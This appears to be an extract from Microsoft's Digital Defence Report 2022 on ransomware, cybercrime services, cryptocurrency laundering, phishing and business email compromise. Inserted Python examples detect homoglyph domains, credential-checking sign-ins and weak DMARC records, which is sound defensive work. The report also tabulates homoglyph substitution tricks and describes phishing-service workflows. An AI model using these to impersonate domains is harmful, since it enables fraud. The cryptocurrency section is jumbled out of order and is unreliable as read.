None of the impacted organisations implemented proper administrative credential segregation and least privilege access principles via dedicated workstations during the management of their critical identity and high-value assets, such as proprietary systems and business-critical applications.
Privileged account security
In 88% of engagements, MFA was not implemented for sensitive and highly privileged accounts, leaving a security gap for attackers to compromise credentials and pivot further attacks using legitimate credentials.
Administrators across 84% of organisations did not use privileged identity controls such as just-in-time access to prevent further nefarious use of compromised privileged credentials.
2 Ineffective security operations
Our data shows organisations which suffered ransomware attacks have significant gaps in their security operations, tooling and information technology asset lifecycle management. Based on the available data, the following gaps were most observed:
Patching:
68% of impacted organisations did not have an effective vulnerability and patch management process, and a high dependence on manual processes versus automated patching led to critical openings. Manufacturing and critical infrastructure continue to struggle with maintenance and patching of legacy operational technology (OT) systems.
Lack of security operations tooling:
Most organisations reported a lack of end-to-end security visibility due to a lack or misconfiguration of security tools, leading to a decrease in detection and response effectiveness.
60% of organisations reported no use of an EDR⁶ tool, a fundamental technology for detection and response.
60% did not invest in security information and event management (SIEM) technology, leading to monitoring silos, limited ability to detect end-to-end threats and inefficient security operations. Automation remains a key gap in SOC tooling and processes, forcing SOC staff to spend countless hours making sense of security telemetry.
84% of impacted organisations did not enable integration of their multi-cloud environments into their security operations tooling.
Response and recovery processes:
Lack of an effective response plan was a critical area observed in 76% of impacted organisations, preventing proper organisational crisis readiness and negatively impacting time to respond and recover.
3 Limited data protection
Many compromised organisations lacked proper data protection processes, leading to a severe impact on recovery times and the capability to return to business operations. The most common gaps encountered include:
Immutable backup:
44% of organisations did not have immutable backups for the impacted systems. Data also shows administrators did not have backups and recovery plans for critical assets such as AD.
Data loss prevention:
Attackers usually find their way to compromise systems by exploiting vulnerabilities in the organisation, exfiltrating critical data for extortion, intellectual property theft or monetisation.
92% of impacted organisations did not implement effective data loss prevention controls to mitigate these risks, leading to critical data loss.
Ransomware declined in some
regions and increased in others
This year we observed a drop in the
overall number of ransomware cases
reported to our response teams in North
America and Europe compared to the
previous year. At the same time, cases
reported in Latin America increased.
One interpretation of this observation is
cybercriminals pivoted away from areas
perceived to have a higher risk of triggering
law enforcement scrutiny in favour of softer
targets. Since Microsoft did not observe a
substantial improvement in enterprise network
security worldwide to explain the decrease in
ransomware-related support calls, we believe
the most likely cause is a combination of law
enforcement activity in 2021 and 2022 which
increased the cost of criminal activity, along with
some geopolitical events of 2022.
One of the most prevalent RaaS operations belongs to a Russian-speaking criminal group known as REvil (also known as Sodinokibi) that has been active since 2019. In October 2021, REvil's servers were taken offline as part of the international law enforcement Operation GoldDust.⁷ In January 2022, Russia arrested 14 alleged REvil members and raided 25 locations associated with them.⁸ This was the first time Russia acted against ransomware operators on its soil.
While law enforcement activities likely slowed the frequency of attacks in 2022, threat actors might well develop new strategies to avoid being caught in the future. Moreover, tension between Russia and the United States over Russia's invasion of Ukraine appears to have put an end to Russia's nascent cooperation in the global fight against ransomware. After a brief period of uncertainty following the REvil arrests, the United States and Russia ceased cooperation in pursuing ransomware actors, which means cybercriminals might view Russia as a safe haven once more.
Looking ahead, we predict the pace of ransomware activities will depend on the outcome of some key questions:
1. Will governments take action to prevent ransomware criminals from operating within their borders, or seek to disrupt actors operating from foreign soil?
2. Will ransomware groups change tactics to remove the need for ransomware and resort to extortion-style attacks?
3. Will organisations be able to modernise and transform their IT operations faster than criminals can exploit vulnerabilities?
4. Will advancements in tracking and tracing ransom payments force ransom recipients to change tactics and negotiations?
2×: Ransomware attacks decreased in some regions, but ransom demands more than doubled.
Actionable insights
1 Focus on holistic security strategies, as all of the ransomware families take advantage of the same security weaknesses to impact a network.
2 Update and maintain security basics to increase the defence-in-depth base level of protection and modernise security operations. Moving to the cloud allows you to detect threats more quickly and respond faster.
Links to further information
Protect your organisation from ransomware | Microsoft Security
Seven ways to harden your environment against compromise | Microsoft Security Blog
Improving AI-based defences to disrupt human-operated ransomware | Microsoft 365 Defender Research Team
Security Insider: Explore the latest cybersecurity insights and updates | Microsoft Security
Cybercrime-as-a-Service
Cybercrime-as-a-Service (CaaS) is a growing and evolving threat to customers worldwide. The Microsoft Digital Crimes Unit (DCU) observed continued growth of the CaaS ecosystem with an increasing number of online services facilitating various cybercrimes, including BEC and human-operated ransomware. Phishing continues to be a preferred attack method as cybercriminals can acquire significant value from successfully stealing and selling access to stolen accounts.
In response to the expanding CaaS market, DCU enhanced its listening systems to detect and identify CaaS offerings across the entire ecosystem of internet, deep web, vetted forums,⁹ dedicated websites, online discussion forums and messaging platforms.
2,750,000 site registrations successfully blocked by DCU this year to get ahead of criminal actors that planned to use them to engage in global cybercrime.
DCU investigations into CaaS surfaced a number of key trends:
The number and sophistication of services is increasing.
One example is the evolution of web shells, which typically consist of compromised web servers used to automate phishing attacks. DCU observed CaaS resellers simplifying the upload of phishing kits or malware through specialised web dashboards. CaaS sellers often subsequently attempt to sell additional services to the threat actor through the dashboard, such as spam message services and specialised spam recipient lists based on defined attributes including geographic location or profession. In some instances, we observed a single web shell being used in multiple attack campaigns, which suggests threat actors might maintain persistent access to the compromised server.
We also observed an increase in anonymisation services available as part of the CaaS ecosystem, as well as offers for virtual private network (VPN) and virtual private server (VPS) accounts. In most instances, the VPN/VPS offered were initially procured through stolen credit cards.
CaaS websites also offered a larger number of remote desktop protocol (RDP), secure shell (SSH) and cPanel accounts for use as a platform to orchestrate cybercrime attacks. CaaS merchants configure the RDP, SSH and cPanel accounts with appropriate tools and scripts to facilitate various types of cyberattacks.
Homoglyph domain creation services are increasingly requiring payment in cryptocurrencies.
Homoglyph domains impersonate legitimate domain names by using characters that are identical or nearly identical in appearance to another character. The aim is to deceive the viewer into thinking the homoglyph domain is the genuine domain. These domains are a ubiquitous threat and a gateway for a significant amount of cybercrime. CaaS sites now sell custom homoglyph domain names, which allows buyers to request specific company and domain names to impersonate. After payment is received, the CaaS merchants use a homoglyph generator tool to select the domain name and then register the malicious homoglyph. Payment for this service is almost exclusively in cryptocurrency.
Cybercriminals are now collaborating across time zones and languages to deliver specific results.
For example, one CaaS website administered by an individual in Asia maintains operations in Europe and creates malicious accounts in Africa. The multi-jurisdictional nature of these operations presents complex law enforcement challenges. In response, DCU focuses its efforts on disabling malicious criminal infrastructure used to facilitate CaaS attacks and collaborating with law enforcement agencies around the world to hold criminals accountable.
Cybercriminals are increasingly using analytics to maximise reach, scope and gain.
Like legitimate businesses, CaaS websites must ensure the validity of products and services to maintain a solid reputation. For example, CaaS websites routinely automate access to compromised accounts to ensure the validity of compromised credentials. Cybercriminals will discontinue sales of specific accounts when passwords are reset or vulnerabilities patched. Increasingly, we identified CaaS websites providing buyers with on-demand verification as a quality control process. As a result, buyers can feel confident the CaaS website sells active accounts and passwords, while reducing potential costs to the CaaS merchant if the stolen credentials are remediated prior to sale.
DCU also observed CaaS websites offering buyers the option to purchase compromised accounts from specific geographic locations, designated online service providers and specifically targeted individuals, professions and industries. Frequently ordered accounts focus on professionals or departments that process invoicing, such as CFOs or ‘Accounts Receivable’. Similarly, industries participating in public contracting are often targeted due to the quantity of information that is made available through the public bidding process.
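The homoglyph-domain trend described in this section is one a defender can check for mechanically: normalise each observed domain to what it looks like, then compare against the domains you own. The following is an added example written for this page, not code from the report or from DCU: it decodes punycode labels, folds Unicode compatibility forms, maps a small set of confusable characters and letter pairs to their ASCII look-alikes, and reports which trusted domain a candidate imitates. The confusable map is an illustrative subset of the Unicode confusables data, and the trusted-domain list is an assumption; a production check would load the full confusables table and the organisation's own domain inventory.

```python
"""Added example: flag homoglyph (look-alike) domains against domains you own
or trust. Not code from the report or from DCU."""
import unicodedata

# Single characters that render like ASCII letters. Illustrative subset of the
# Unicode confusables data, not a complete table.
CONFUSABLE_CHARS = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0455": "s", "\u0458": "j",
    "\u03b1": "a", "\u03bf": "o", "\u0131": "i", "\u0142": "l",
    "0": "o", "1": "l", "3": "e", "5": "s", "|": "l",
}
# Letter pairs that read as one letter in many fonts.
CONFUSABLE_PAIRS = [("rn", "m"), ("vv", "w"), ("cl", "d")]

# Assumed list of domains the organisation owns or trusts.
TRUSTED_DOMAINS = {"microsoft.com", "office.com"}


def to_unicode(domain):
    """Lower-case the domain and decode punycode labels (xn--...) so the
    confusable checks see the characters a user would actually see."""
    labels = []
    for label in domain.strip().lower().rstrip(".").split("."):
        if label.startswith("xn--"):
            try:
                label = label.encode("ascii").decode("idna")
            except UnicodeError:
                pass  # undecodable label: keep the raw form
        labels.append(label)
    return ".".join(labels)


def skeleton(domain):
    """Canonical 'what it looks like' form: NFKC-fold (full-width letters etc.),
    map confusable characters to their ASCII look-alikes, then collapse pairs."""
    text = unicodedata.normalize("NFKC", to_unicode(domain))
    text = "".join(CONFUSABLE_CHARS.get(ch, ch) for ch in text)
    for pair, single in CONFUSABLE_PAIRS:
        text = text.replace(pair, single)
    return text


def find_lookalike(candidate, trusted=TRUSTED_DOMAINS):
    """Return the trusted domain that candidate impersonates, or None if the
    candidate is itself trusted or does not resemble any trusted domain."""
    seen = to_unicode(candidate)
    if seen in trusted:
        return None
    target = skeleton(candidate)
    for legit in trusted:
        if skeleton(legit) == target:
            return legit
    return None


if __name__ == "__main__":
    # Constructed samples: ASCII pair trick, Cyrillic o, digit zero, full-width M,
    # the punycode form a registrar or certificate log would show, and a clean name.
    samples = ["rnicrosoft.com", "micr\u043esoft.com", "0ffice.com",
               "\uff2dicrosoft.com",
               "micr\u043esoft.com".encode("idna").decode("ascii"),
               "microsoft.com"]
    for d in samples:
        print(f"{d!r:40} -> {find_lookalike(d)}")
```

Feeding certificate-transparency logs or newly registered domain feeds through `find_lookalike` gives an early warning before the phishing campaign starts; note that the skeleton comparison is deliberately strict (exact match after folding), so typosquats that add or drop letters need a separate edit-distance check.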
End-to-end cybercrime services are selling subscriptions to managed services.
Typically, each step in the commission of an online crime can expose threat actors if operational security is poor. The risk of exposure and identification increases if services are purchased from multiple CaaS sites. DCU observed a concerning trend on the dark web whereby there is an increase in services offering to anonymise software code and genericise website text to reduce exposure. End-to-end cybercrime subscription service providers manage all services and guarantee results, which further reduces exposure risks to the subscribing OCN. The reduced risk has increased the popularity of these end-to-end services.
Phishing-as-a-Service (PhaaS) is one example of an end-to-end cybercrime service. PhaaS is an evolution of prior services known as fully undetectable (FUD) services and is offered on a subscription basis. Typical PhaaS terms include keeping phishing websites active for a month.
With PhaaS, cybercriminals offer multiple services within a single subscription. In general, a purchaser needs to take only three actions:
1. Select a phishing site template/design from among the hundreds offered.
2. Provide an email address to receive credentials obtained from phishing victims.
3. Pay the PhaaS merchant in cryptocurrency.
Once these steps are completed, the PhaaS merchant creates services with three or four layers of redirect and hosting resources to target specific users. The campaign is subsequently launched, and victim credentials are harvested, verified and sent to the email address provided by the purchaser. For a premium, many PhaaS merchants offer to host phishing sites on the public blockchain so they can be accessed by any browser and redirects can point users to a resource on the distributed ledger.
DCU also identified a CaaS merchant offering distributed denial of service (DDoS) on a subscription model. This model outsources the creation and maintenance of the botnet necessary to carry out attacks to the CaaS merchant. Each DDoS subscription customer receives an encrypted service to enhance operational security and one year of 24/7 support. The DDoS subscription service offers different architectures and attack methods, so a purchaser simply selects a resource to attack and the seller provides access to an array of compromised devices on their botnet to conduct the attack. The cost for the DDoS subscription is a mere USD 500.
CaaS sellers increasingly offer compromised credentials for purchase.
Compromised credentials enable unauthorised access to user accounts including email messaging services, corporate file sharing resources and OneDrive for Business. If administrator credentials are compromised, unauthorised users could gain access to confidential files, Azure resources and company user accounts. In many instances, DCU investigations identified unauthorised use of the same credential across multiple servers as a means to automate verifying credentials. This pattern suggests the compromised user might be a victim of multiple phishing attacks or have device malware allowing botnet keyloggers to collect credentials.
CaaS services and products with enhanced features are emerging to avoid detection.
One CaaS seller offers phishing kits with increased layers of complexity and anonymisation features designed to circumvent detection and prevention systems for as little as USD 6 per day. The service offers a series of redirects that perform checks before allowing traffic to the next layer or site. One of these runs over 90 checks for fingerprinting the device, including whether it is a virtual machine, gathering details about the browser and hardware being used, and more. If all checks pass, traffic is sent to a landing page used for phishing.
DCU's work to develop tools and techniques which identify and disrupt CaaS cybercriminals is ongoing. The evolution of CaaS services presents significant challenges, particularly in disrupting cryptocurrency payments.
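The automated credential verification described in the compromised-credentials trend above, the same stolen credential tried from several servers in quick succession, leaves a footprint in sign-in logs that a SOC can hunt for before the account is sold on. The following is an added example written for this page, not code from the report: it parses constructed sign-in records in an assumed CSV layout and flags accounts whose successful sign-ins come from several distinct source addresses inside a short window, the shape a checker produces and a single human user rarely does. The record format, the ten-minute window and the three-address threshold are assumptions to tune against real data.

```python
"""Added example: find accounts whose successful sign-ins arrive from many
distinct source addresses within a short window, the footprint of automated
credential verification. Not code from the report."""
import csv
from collections import defaultdict
from datetime import datetime, timedelta
from io import StringIO

# Constructed sample sign-in records (assumed CSV layout):
# timestamp (UTC), account, source_ip, result. Addresses are documentation
# ranges; the domain is a placeholder.
SAMPLE_SIGNINS = """\
2022-03-01T08:00:05Z,jdoe@contoso.com,203.0.113.5,Success
2022-03-01T08:00:41Z,jdoe@contoso.com,198.51.100.23,Success
2022-03-01T08:01:12Z,jdoe@contoso.com,192.0.2.77,Success
2022-03-01T08:01:30Z,jdoe@contoso.com,198.51.100.23,Success
2022-03-01T08:03:02Z,jdoe@contoso.com,203.0.113.99,Success
2022-03-01T08:02:10Z,asmith@contoso.com,203.0.113.40,Success
2022-03-01T09:15:00Z,asmith@contoso.com,203.0.113.40,Success
2022-03-01T08:05:00Z,bking@contoso.com,192.0.2.10,Failure
2022-03-01T08:05:02Z,bking@contoso.com,192.0.2.11,Failure
2022-03-01T08:05:04Z,bking@contoso.com,192.0.2.12,Failure
2022-03-01T08:05:06Z,bking@contoso.com,192.0.2.13,Success
2022-03-01T14:00:00Z,bking@contoso.com,192.0.2.50,Success
"""


def parse_signins(text):
    """Parse CSV sign-in lines into (time, account, ip, success) tuples."""
    records = []
    for ts, account, ip, result in csv.reader(StringIO(text)):
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        records.append((when, account.lower(), ip, result == "Success"))
    return records


def find_credential_checkers(records, window_seconds=600, min_ips=3):
    """Return {account: sorted source IPs} for accounts with successful sign-ins
    from at least min_ips distinct addresses inside any window-sized interval.
    Only successes count: a checker confirming a stolen password succeeds,
    whereas password spraying shows up as failures and needs a separate rule."""
    window = timedelta(seconds=window_seconds)
    by_account = defaultdict(list)
    for when, account, ip, ok in records:
        if ok:
            by_account[account].append((when, ip))
    flagged = {}
    for account, events in by_account.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            # Sliding window anchored at each successful sign-in.
            ips = {ip for when, ip in events[i:] if when - start <= window}
            if len(ips) >= min_ips:
                flagged[account] = sorted(ips)
                break
    return flagged


if __name__ == "__main__":
    records = parse_signins(SAMPLE_SIGNINS)
    for account, ips in find_credential_checkers(records).items():
        print(f"{account}: {len(ips)} source addresses within 10 minutes -> {ips}")
```

Against the sample data only `jdoe@contoso.com` is flagged: four distinct addresses in three minutes, which is what the on-demand verification described above looks like from the victim tenant's side. The natural response is to force a password reset and revoke sessions for that account before the buyer ever logs in.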
cash-out options, such as centralised exchanges (CEX), peer-to-peer (P2P) and over the counter (OTC) exchanges. DEXs are an attractive laundering location because they often do not follow AML measures.
In December 2021, hackers attacked the global cryptocurrency trading platform AscendEx and stole approximately USD 77.7 million in cryptocurrency belonging to its customers.¹² AscendEx hired blockchain analytics firms and contacted other CEXs so the wallets receiving stolen funds could be blacklisted. Additionally, addresses where the coins were sent were labelled as such on the Ethereum blockchain explorer Etherscan.¹³ In order to circumvent the alerting and blacklisting, the hackers sent USD 1.5 million in Ethereum to Uniswap, one of the world's largest DEXs, on February 18, 2022.¹⁴
The adoption of stronger AML measures by DEXs could blunt laundering activity on their platforms and force cybercriminals to use other obfuscation methods like coin tumbling or unlicensed exchanges. As an example, Uniswap recently announced it will start to use blacklists to block wallets known to be involved in illicit activities from transacting on the exchange.¹⁵
Tracking ransomware payments
Ransomware is one of the largest sources of
illicitly gained cryptocurrency. In an effort to
disrupt malicious technical infrastructure used in
ransomware attacks – for example, the disruption
of Zloader in April 202211
– Microsoft’s DCU
tracks criminal wallets to enable cryptocurrency
tracking and recovery capabilities.
DCU investigators have observed ransomware
actors evolving their communication tactics with
victims to conceal the money trail. Originally,
cybercriminals included Bitcoin addresses in their
ransom notes. However, this made it easy to
follow payment transactions on the blockchain,
so ransomware actors stopped including wallet
addresses and instead appended email addresses
or links to chat websites to communicate ransom
payment addresses to victims. Some actors
even created unique webpages and logins for
each victim to prevent security researchers and
law enforcement from obtaining the criminals’
wallet addresses by pretending to be victims.
Despite criminals’ efforts to hide their tracks,
some ransom payments can still be recovered
by working with law enforcement and crypto
analysis companies that can track movement
on the blockchain.
Trending: DEX laundering of illicit proceeds
A key issue for cybercriminals is the
conversion of cryptocurrency to fiat currency.
Cybercriminals have several potential avenues
for conversion, each of which carries a different
degree of risk. One method used to reduce risk
is to launder proceeds through a decentralised
exchange (DEX) before cashing out via available
Criminal use of
cryptocurrencies
As the adoption of cryptocurrency
becomes mainstream, criminals are
increasingly using it to evade law
enforcement and anti-money laundering
(AML) measures. This heightens the
challenge for law enforcement to track
and trace cryptocurrency payments
to cybercriminals.
Worldwide spending on blockchain solutions
grew by approximately 340% over the last four
years, while new cryptocurrency wallets grew
by around 270%. There are more than 83 million
unique wallets globally, and the total market
capitalisation of all cryptocurrencies was
approximately USD 1.1 trillion as of July 28, 2022.10
Source: Twitter.com – @PeckShieldAlert (PeckShield
is a China-based blockchain security company).
Using the cryptocurrency investigative tool Chainalysis, Microsoft’s Digital Crimes Unit discovered the AcendEX
hackers swapped their stolen funds at a smaller DEX called Curve in addition to Uniswap. This diagram illustrates
the laundering routes the team uncovered. Each circle represents a cluster of wallets and the numbers on each line
represent the total amount of Ethereum transmitted for laundering purposes.
Actionable insights
1 If you are a victim of cybercrime who has
paid the criminal using cryptocurrency,
contact local law enforcement who
might be able to help track and recover
lost funds.
2 Become familiar with the ALM measures
in place when selecting a DEX.
Links to further information
Hardware-based threat defence against
increasingly complex cryptojackers |
Microsoft 365 Defender Research Team
Uniswap V3
Curve
AscendEX.com
AscendEX.com
stolen funds
11-12-2021
72.19
ETH
ETH
46.77
Tracking illicitly gained cryptocurrency
20 Microsoft Digital Defence Report 2022
The evolving phishing threat landscape

Credential phishing schemes are on the rise and remain a substantial threat to users everywhere because they indiscriminately target all inboxes. Among the threats our researchers track and protect against, the volume of phishing attacks is orders of magnitude greater than all other threats.

Using data from Defender for Office, we see malicious email and compromised identity activity. Azure Active Directory Identity Protection provides still more information through compromised identity event alerts. Using Defender for Cloud Apps, we see compromised identity data access events, and Microsoft 365 Defender (M365D) provides cross-product correlation. The lateral movement metric comes from Defender for Endpoint (attack behaviour alerts and events), Defender for Office (malicious email) and again M365D for cross-product correlation.

531,000: In addition to the URLs blocked by Defender for Office, our Digital Crimes Unit directed the takedown of 531,000 unique phishing URLs hosted outside of Microsoft.

1 hr 12 m: The median time it takes for an attacker to access your private data if you fall victim to a phishing email.¹⁶

1 hr 42 m: The median time for an attacker to begin moving laterally within your corporate network once a device is compromised.¹⁷

710 million phishing emails blocked per week.

[Chart: Detected phish emails, in millions per week, July 2021 to June 2022.] The number of phish detections per week continues to rise. The decrease in December-January is an expected seasonal drop, also reported in last year’s report. Source: Exchange Online Protection signals.

Microsoft 365 credentials remain one of the most highly sought-after account types for attackers. Once login credentials are compromised, attackers can log in to corporate-tied computer systems to facilitate infection with malware and ransomware, steal confidential company data and information by accessing SharePoint files, and continue the spread of phish by sending additional malicious emails using Outlook, among other actions.

In addition to campaigns with broader targets, phishing for credentials, donations and personal information, attackers are targeting selective businesses for larger payouts. Email phishing attacks against businesses for financial gain are collectively referred to as BEC attacks. Microsoft detects millions of BEC emails every month, equivalent to 0.6% of all phishing emails observed. A report from IC3¹⁸ published in May 2022 indicates an upward trend in exposed losses due to BEC attacks.

The techniques used in phishing attacks continue to increase in complexity. In response to countermeasures, attackers adapt new ways to implement their techniques and increase the complexity of how and where they host campaign operation infrastructure. This means organisations must regularly reassess their strategy for implementing security solutions to block malicious emails and strengthen access control for individual user accounts.
21 Microsoft Digital Defence Report 2022
The evolving phishing threat landscape
Continued

More than ever, phishers are relying on legitimate infrastructure to operate, driving a rise in phishing campaigns aimed at compromising various aspects of an operation so they do not have to purchase, host or operate their own. For example, malicious emails might originate from compromised sender accounts. Attackers benefit from using these email addresses which have a higher reputation score and are seen as more trustworthy than newly created accounts and domains. In some more advanced phishing campaigns, we observed attackers preferring to send and spoof from domains which have DMARC¹⁹ incorrectly set up with a ‘no action’ policy, opening the door for email spoofing.

We continue to observe a steady year-over-year increase in phishing emails. The shift to remote work in 2020 and 2021 saw a substantial increase in phishing attacks aiming to capitalise on the changing work environment. Phish operators are quick to adopt new email templates using lures aligned with major world events such as the COVID-19 pandemic and themes linked to collaboration and productivity tools such as Google Drive or OneDrive file sharing. While COVID-19 themes have diminished, the war in Ukraine became a new lure starting in early March 2022. Our researchers observed a staggering increase of emails impersonating legitimate organisations soliciting cryptocurrency donations in Bitcoin and Ethereum, allegedly to support Ukrainian citizens.

Only a few days after the start of the war in Ukraine in late February 2022, the number of detected phishing emails containing Ethereum addresses encountered across enterprise customers increased dramatically. Total encounters peaked in the first week of March when half a million phishing emails contained an Ethereum wallet address. Prior to the start of the war, the number of Ethereum wallet addresses across other emails detected as phish was significantly less, averaging a few thousand emails per day.

[Chart: Phishing emails with Ethereum wallet addresses, in thousands, July 2021 to June 2022.] Total emails detected as phish containing Ethereum wallet addresses increased at the start of the Ukraine-Russia conflict and tapered off after the initial push.

Large phish operations tend to use cloud services and cloud virtual machines (VMs) to operationalise large scale attacks. Attackers can fully automate the process of deploying and delivering emails from VMs using SMTP email relays or cloud email infrastructure to benefit from the high deliverability rates and positive reputation of these legitimate services. If malicious email is allowed to be sent through these cloud services, defenders must rely on strong email filtering capabilities to block emails from entering their environment.

Microsoft accounts remain a top target for phishing operators, as evidenced by the numerous phishing landing pages which impersonate the Microsoft 365 login page. For example, phishers attempt to match the Microsoft login experience in their phish kits by generating a unique URL customised to the recipient. This URL points to a malicious webpage developed to harvest credentials, but a parameter in the URL will contain the specific recipient’s email address. Once the target navigates to the page, the phish kit will pre-populate user login data and a corporate logo customised to the email recipient, mirroring the appearance of the targeted company’s custom Microsoft 365 login page.

[Figure: Phishing page impersonating a Microsoft login with dynamic content.]
22 Microsoft Digital Defence Report 2022
Spotlight on business email compromise

Cybercriminals are developing increasingly complex schemes and techniques to defeat security settings and target individuals, businesses and organisations. We are investing significant resources to further enhance our BEC enforcement programme in response.

BEC is the costliest financial cybercrime, with an estimated USD 2.4 billion in adjusted losses in 2021, representing more than 59% of the top five internet crime losses globally.²⁰ To understand the scope of the problem and how best to protect users against BEC, Microsoft security researchers have been tracking the most common themes used in attacks.

BEC themes (January-June 2022), by percentage of occurrence:
Invoice fraud 9.3%
BEC lure 79.9%
Payroll redirection 4.6%
Business information 4.3%
Gift card scam 1.9%

BEC trends

As a point of entry, BEC attackers normally attempt to start a conversation with potential victims to establish rapport. Posing as a colleague or business acquaintance, the attacker gradually leads the conversation in the direction of a monetary transfer. The introduction email, which we track as a BEC lure, represents close to 80% of detected BEC emails. Other trends identified by Microsoft security researchers over the past year include:

• The most frequently used techniques in BEC attacks observed in 2022 were spoofing²¹ and impersonation.²²
• The BEC subtype causing the most financial damage to victims was invoice fraud (based on volume and requested dollar amounts seen in our BEC campaign investigations).
• Business information theft, such as accounts payable reports and customer contacts, enables attackers to craft convincing invoice fraud.
• Most payroll redirection requests were sent from free email services and seldom from compromised accounts. Email volume from these sources spiked around the first and fifteenth of each month, the most common pay dates.
• Despite being well-known avenues for fraud, gift card scams comprised only 1.9% of the BEC attacks detected.

Actionable insights

Defending against phish

To reduce your organisation’s exposure to phish, IT administrators are encouraged to implement the following policies and features:

1 Require the use of MFA across all accounts to limit unauthorised access.
2 Enable conditional access features for highly privileged accounts to block access from countries, regions and IPs that do not typically generate traffic at your organisation.
3 Consider using physical security keys for executives, employees involved in payment or purchase activities and other privileged accounts.
4 Enforce the use of browsers which support services such as Microsoft SmartScreen to analyse URLs for suspicious behaviours and block access to known malicious websites.²³
5 Use a machine-learning based security solution that quarantines high probability phish and detonates URLs and attachments in a sandbox before email reaches the inbox, such as Microsoft Defender for Office 365.²⁴
6 Enable impersonation and spoofing protection features across your organisation.
7 Configure DomainKeys Identified Mail (DKIM) and Domain-based Message Authentication, Reporting & Conformance (DMARC) action policies to prevent delivery of non-authenticated emails that might be spoofing reputable senders.
8 Audit tenant and user created allow rules and remove broad domain and IP based exceptions. These rules often take precedence and can allow known malicious emails through email filtering.
9 Regularly run phishing simulators to gauge the potential risk across your organisation and to identify and educate vulnerable users.

Links to further information

From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud | Microsoft 365 Defender Research Team, Microsoft Threat Intelligence Centre (MSTIC)
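A check for the DMARC ‘no action’ policy that attackers look for when choosing domains to spoof, and that item 7 of the list above tells administrators to replace with an action policy. This is an added example, not code from the report: it works on the record text itself (in production that text comes from the TXT record published at _dmarc.<domain>), and the three sample records are constructed.

```python
"""Assess a DMARC TXT record for settings that let spoofed mail through.

Added example, not code from the Microsoft report. It parses the
'tag=value; tag=value' syntax of a DMARC record and reports the
weaknesses a mail-security team would want fixed: a 'no action'
policy (p=none), an unenforced subdomain policy, partial enforcement
via pct=, and missing aggregate reporting. All records are constructed.
"""
from dataclasses import dataclass, field

# Record an organisation enforcing DMARC would publish (constructed sample).
STRONG_RECORD = "v=DMARC1; p=reject; sp=reject; adkim=s; aspf=s; rua=mailto:dmarc@example.com"
# 'No action' record: the owner gets reports, but receivers deliver failing
# mail as usual, so the domain can be spoofed freely (constructed sample).
WEAK_RECORD = "v=DMARC1; p=none; rua=mailto:dmarc@example.com"
# Partial enforcement: quarantine applied to only 10% of failing mail,
# subdomains left unprotected, and no reporting address (constructed sample).
PARTIAL_RECORD = "v=DMARC1; p=quarantine; pct=10; sp=none"


@dataclass
class DmarcAssessment:
    policy: str
    findings: list = field(default_factory=list)

    @property
    def enforcing(self) -> bool:
        """True only when no weakness was found."""
        return not self.findings


def parse_dmarc(record: str) -> dict:
    """Split 'tag=value; tag=value' into a dict with lower-cased tag names."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record: str) -> DmarcAssessment:
    """Evaluate one DMARC record and list every setting that weakens it."""
    tags = parse_dmarc(record)
    findings = []
    if tags.get("v", "").upper() != "DMARC1":
        findings.append("missing or invalid v=DMARC1 tag")
    policy = tags.get("p", "").lower()
    if policy == "none":
        findings.append("p=none: receivers take no action on spoofed mail")
    elif policy not in ("quarantine", "reject"):
        findings.append(f"unrecognised or missing policy p={policy!r}")
    # sp= governs subdomains and defaults to the value of p= when absent.
    sub_policy = tags.get("sp", policy).lower()
    if sub_policy == "none":
        findings.append("sp=none: subdomains can be spoofed freely")
    # pct= defaults to 100; anything lower leaves a share of failing mail unfiltered.
    pct = tags.get("pct", "100")
    if not pct.isdigit() or int(pct) < 100:
        findings.append(f"pct={pct}: policy applied to only part of failing mail")
    if "rua" not in tags:
        findings.append("no rua= address: spoofing attempts will not be reported")
    return DmarcAssessment(policy=policy, findings=findings)
```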
23 Microsoft Digital Defence Report 2022
Homoglyph deception

BEC and phishing are common social engineering tactics. Social engineering plays a significant role in crime, persuading a target to interact with the criminal by gaining trust.

In physical commerce, trademarks are used to secure trust in the origin of a product or service, and counterfeit products are an abuse of the trademark. Similarly, cybercriminals pose as a contact familiar to the target during a phishing attack, using homoglyphs to deceive potential victims.

A homoglyph is a domain name used for email communication in BEC, in which a character is replaced by one that is identical or nearly identical in appearance, in order to deceive the target.

BEC generally has two phases, the first of which involves compromise of credentials. These types of credential leaks can be a result of phishing attacks or large data breaches. The credentials are then sold or traded on the dark web. The second phase is the fraud phase, where attackers use compromised credentials to engage in sophisticated social engineering using homoglyph email domains.

Homoglyph techniques used in BEC attempts

Technique: % of domains showing homoglyph technique
sub l for I: 25%
sub i for l: 12%
sub q for g: 7%
sub rn for m: 6%
sub .cam for .com: 6%
sub 0 for o: 5%
sub ll for l: 3%
sub ii for i: 2%
sub vv for w: 2%
sub l for ll: 2%
sub e for a: 2%
sub nn for m: 1%
sub ll for I, sub l for i: 1%
sub o for u: 1%

Analysis of over 1,700 homoglyph domains between January-July 2022. While 170 homoglyph techniques were used, 75% of domains used just 14 techniques.

A homoglyph in action

A homoglyph domain that looks identical to a mail domain the victim recognises is registered on a mail provider with a username that is identical. A hijacked email is then sent from the hijacked domain with new payment instructions.

Progression of a BEC attack

Leveraging open-source intelligence and access to email threads, the criminal identifies individuals who have responsibility for invoicing and payments. They then create an impersonation of an email address of the individual sending invoices. This impersonation is composed of an identical username and a mail domain that is a homoglyph of the genuine sender.

The attacker copies an email chain containing a legitimate invoice, then changes the invoice to contain their own bank details. This new, modified invoice is then resent from the homoglyph impersonation email to the target. Because the context makes sense and the email looks genuine, often the target follows the fraudulent instructions.

Actionable insights

1 Enforce the use of browsers that support services to analyse URLs for suspicious behaviours and block access to known malicious websites, such as Safe Links and SmartScreen.²⁵
2 Use a machine-learning based security solution that quarantines high probability phish and detonates URLs and attachments in a sandbox before email reaches the inbox.

Links to further information

Internet Crime Complaint Centre (IC3) | Business Email Compromise: The USD 43 Billion Scam
Spoof intelligence insight – Office 365 | Microsoft Docs
Impersonation insight – Office 365 | Microsoft Docs
